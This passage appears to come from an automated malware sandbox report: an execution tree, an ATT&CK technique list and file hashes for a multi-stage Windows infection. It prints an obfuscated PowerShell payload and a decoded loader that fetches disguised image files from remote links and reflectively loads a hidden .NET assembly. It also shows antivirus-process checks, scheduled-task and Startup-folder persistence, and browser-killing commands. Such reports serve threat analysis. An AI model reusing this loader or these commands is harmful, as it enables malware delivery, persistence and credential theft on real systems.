@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1120
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe"C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1956
-
-
C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1988
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:748
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵
- System Location Discovery: System Language Discovery
PID:556
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:2160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges6⤵
- System Location Discovery: System Language Discovery
PID:1384
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵PID:1096
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 10286⤵
- Loads dropped DLL
- Program crash
PID:2668
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 5005⤵
- Loads dropped DLL
- Program crash
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe"C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 12005⤵
- Loads dropped DLL
- Program crash
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2680 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat6⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:2960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:1992
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1900
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530906⤵
- System Location Discovery: System Language Discovery
PID:2040
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub6⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good6⤵
- System Location Discovery: System Language Discovery
PID:992
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com6⤵
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m6⤵
- System Location Discovery: System Language Discovery
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:824 -
C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe7⤵PID:1708
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:2872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe"C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2244 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 11885⤵
- Program crash
PID:2180
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"4⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"5⤵PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"5⤵PID:2656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 5005⤵
- Program crash
PID:2928
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe"C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe"4⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 11885⤵
- Program crash
PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe"C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe"4⤵PID:2660
-
-
C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe"C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe"4⤵PID:2428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- Kills process with taskkill
PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- Kills process with taskkill
PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- Kills process with taskkill
PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe"C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe"4⤵PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"4⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"5⤵PID:2056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 5005⤵
- Program crash
PID:1560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2240
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BFC21C78-FBF1-4301-AE56-0E242F63A1C2} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\ProgramData\WMIsys\CONAtdrive.exeC:\ProgramData\WMIsys\CONAtdrive.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\ProgramData\WMIsys\CONAtdrive.exeC:\ProgramData\WMIsys\CONAtdrive.exe2⤵PID:2220
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z504R1Z\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
262KB
MD536105cc7aff011ef834f9e83717f9ab1
SHA19b5a1a9da2f1e22ae23517c45b82c734a5793ded
SHA25636263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2
SHA51238662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50
-
Filesize
2.9MB
MD5f60c4315a77f0a2f050c3e60d7fbe975
SHA1d577a187304ace9ba700e13f9dd66e851efaffef
SHA25631b7a2eee7649ee4c871b556a23022a126092ba8bc3b07d2fe28f6cafa6ffcfd
SHA512ff7e726e1bf4955c1237ece1ecbbecd194d626474daad0536b21ca27efbd950b2816ac25b22c2b57cf6798c4eabd03ffbca45b1f0208544181d974553649b11e
-
Filesize
1.7MB
MD5c70ba9b3fc03b137ac57e9f9eb7f669b
SHA1188d35cc8f3e888aacd4a03aaac5979fa7680b01
SHA256d7c6199beb7718942d7fa14f3bebdae21a1142d7ccdbf4486f79c04228a873b7
SHA51230efb384601044f0de192d3ae6de6d90e2dc6d260cabaf35ad27c74d3181ddf3de7e47d0c0778cbc7ec00a5fabdd2a804889357353511fe6c8200267f2a3e585
-
Filesize
3.8MB
MD5c9e0574f5278149157f8cd14ad266886
SHA13b1671a65d6ed7beda7001eaf7b239bf153012cd
SHA25698ffb7534eb707b6d086ff3c049a424d19256056c43e09945097dae5538a7eb9
SHA512ec409f1f3b4484574697877c56253e19f2f0c189b8ba0a1cd3e64e1dedc7876cf3a604f0d2496bedfaf20ca1c115055431cd6f7e443189b4ff2a1fb67f32289a
-
Filesize
1.8MB
MD53a684b497af86498fe2f8dc4c392cc51
SHA1ad86b1d97c75406c52864b02eb981e6511ac835e
SHA256f832a90b90aed49ea52fabccce43ef1db001f732a01705346503581a6dd68dd8
SHA512ca4a6558fc0e8996beaaabd809b2978c4f26148adf796031948fc472ac7c49d755c331d5698b0037832fc132e8d620a926a1c20631d2d47af610904bf7f3290c
-
Filesize
4.5MB
MD516bcdf9f515993aa3f2e6e33fd867768
SHA1750d69459a107b7fc45a2073895a51f0d211415d
SHA256873565936ff2ecf66e4efc7c211f555589deea3b94474e65fc5c9ca712a61d3e
SHA5129bca85e004363ac6a554c1120e02f82f4af4cc8c439a40166883eb0c290d636087a3f31200d25bfaff14351e9d0593d7f7d9725f82d7037e4ca47f920347b430
-
Filesize
364KB
MD59dd7f35baa732ab9c19737f7574f5198
SHA1af2f9db558e5c979839af7fc54a9c6f4c5f1945c
SHA256ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6
SHA512ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91
-
Filesize
159KB
MD536beea554789233179f8275b85035d42
SHA1f4bd79044a32adb1b678aaec13eda99d9f169215
SHA256df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163
SHA512f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d
-
Filesize
1.3MB
MD581791c3bf6c8d01341e77960eafc2636
SHA13a9e164448717ced3d66354f17d3bcba9689c297
SHA256c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0
SHA5120629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47
-
Filesize
2.0MB
MD5a62fe491673f0de54e959defbfebd0dd
SHA1f13d65052656ed323b8b2fca8d90131f564b44dd
SHA256936d17e301a6f5b6878b1a6f46a215d5af02d8254c65dc64a8679f7b2ff25213
SHA5124d0ab58f4cd009a48b0bfccc4a3b2163e596db17c5fed2f88b969b752e0704234130377ad7c5488b406a21b51560ec6017609e3f5063771d00a610c2db6f9129
-
Filesize
3.5MB
MD545c1abfb717e3ef5223be0bfc51df2de
SHA14c074ea54a1749bf1e387f611dea0d940deea803
